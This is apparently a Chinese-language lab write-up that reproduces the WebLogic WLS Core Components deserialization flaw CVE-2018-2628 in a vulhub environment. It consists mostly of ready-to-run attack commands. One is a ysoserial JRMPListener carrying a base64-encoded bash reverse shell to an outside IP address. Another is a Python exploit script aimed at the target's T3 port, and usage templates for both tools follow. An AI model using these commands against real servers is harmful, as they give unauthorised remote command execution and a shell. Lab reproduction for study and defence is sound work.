Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
复现环境:
vulhub
漏洞原因:
Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。
复现过程:
启动一个执行反弹shell的一个JRMP Server:
payload:
java -cp ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 4456 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuNDEuNTUuNjAvMTc3MjcgMD4mMQ==}|{base64,-d}|{bash,-i}'
使用expdb的脚本,向目标Weblogic发送数据包:
payload:
python weblogicUnserizlize.py 192.168.43.250 7001 ysoserial-master-8eb5cbfbf6-1.jar 192.168.43.250 4456 JRMPClient
shell反弹成功:
补充:
jar用法:java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
py用法:python exploit.py [目标 ip] [目标 port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]